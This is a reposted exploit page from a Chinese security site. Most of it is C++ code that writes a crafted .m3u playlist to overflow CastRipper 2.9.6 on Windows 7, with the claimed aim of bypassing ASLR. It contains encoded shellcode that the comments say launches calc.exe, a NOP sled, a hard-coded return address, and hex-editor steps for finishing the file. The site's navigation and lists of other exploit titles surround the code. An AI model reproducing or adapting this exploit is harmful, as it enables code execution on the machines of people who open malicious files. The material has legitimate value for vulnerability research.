首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CastRipper 2.9.6 BOF (bypass ASLR) win7
来源:fb.me/Ayrbyte 作者:Ayrbyte 发布时间:2012-06-18  
/*#####################################################
##    ??  %%  %% $$$        >>  > ::    ;;;;;;;;   ##
##   ?? ?  %% %% $ $ ||      >> > ::    ;;    ;;   ##
##  ?????   %%%% $$$ ||___    >>> ::::: ;;;;;;;    ##
## ??   ??    %% $$  ||  ||     > ::    ;;         ##
##      %%%%%%%% $ $ ||__|| >>>>> ::::: ;;;;;;;;   ##
##__________________>>Ayrbyte<<______________________##  
##      Gamerz From b-compi | pasukan berkompi       ##
#######################################################
######################################################################
## Exploit Title: CastRipper 2.9.6 BoF (bypass aslr) win7           ##
## Author: Ayrbyte                                                  ##
## fb: fb.me/Ayrbyte                                                ##
## Vendor or Software Link: Mini-stream Software                    ##
## Link: http://mini-stream.net/castripper/                         ##
## Version: 2.9.6.000 2007.06.09                                    ##
## Tested on: Windows 7 Ultimate                                    ##
## Code: c++                                                        ##
#########################################################################################
## Greetz To : Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,    ## 
##             Zet Dot Exe, Gabby X-Friends, Valcon Trignome and all b-compi family    ##
#########################################################################################

----------------->We are B-Compi... We are Hacker... We Are Proud...!<----------------------*/

#include <iostream>
using namespace std;
/*#----->opcode untuk menjalankan calc.exe<-----#*/
char opcode[] = 
"\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83";
int len = strlen(opcode);
int main(){
/*#----->Membuka file Ayrbyte.m3u<-----#*/
FILE *teksfile;
teksfile = fopen("c:\\Ayrbyte.m3u", "w");
/*#----->Menaruh (NOP *32)+opcode ke offset 000F5258<-----#*/
for(int i=0;i < 8677;i++)
{ fputs("\xCC", teksfile); }
for(int i=0;i < 32;i++)
{ fputs("\x90", teksfile); }
fputs(opcode, teksfile);
/*#----->Mengisi EIP dengan offset 000F5258-------------------- 
--------atau "\x58\x52\x0F\x00" dalam bentuk-------------------
--------litle-endian nya<-----------------------------------#*/
for(int i=0;i < 17412 - len;i++)
{ fputs("\xCC", teksfile); }
fputs("\x58\x52\x0F\x00", teksfile);
/*#----->Mengisi input agar tetap berjumlah 50000<-----#*/
for(int i=0;i < 50000 - (8677+32+len+(17412-len)+4);i++)
{ fputs("\xCC", teksfile); }
/*#----->End Of File<-----#*/    
fclose(teksfile);
return 0;}

/*#######################################################
NOTE :
    first We must change some value manually, coz c++ can't write \x00 value
    >> open Ayrbyte.m3u on hex editor
    >> search this hexa "58 52 0F"
    >> it's on offset 00006600 "CC CC CC CC CC CC CC CC CC 58 52 0F CC CC CC CC"
    >> replace CC in front of "0F" with "00"
    >> so it's like this
    offset 00006600 "CC CC CC CC CC CC CC CC CC 58 52 0F 00 CC CC CC"
    second to keep EIP, Ayrbyte.m3u path must be in C:\Ayrbyte.m3u
#######################################################*/
    

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Lattice Semiconductor PAC-Desi
·Lattice Semiconductor PAC-Desi
·ComSndFTP 1.3.7 Beta USER Buff
·TFM MMPlayer (m3u/ppl File) Bu
·MS12-037 Internet Explorer Sam
·Karafun Player 1.20.86 .m3u Cr
·Adobe Illustrator CS5.5 Memory
·Microsoft XML Core Services MS
·ESRI ArcGIS 10.0.X / ArcMap 9
·PHP apache_request_headers Fun
·Wyse Machine Remote Power off
·XM Easy Personal FTP Server v
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved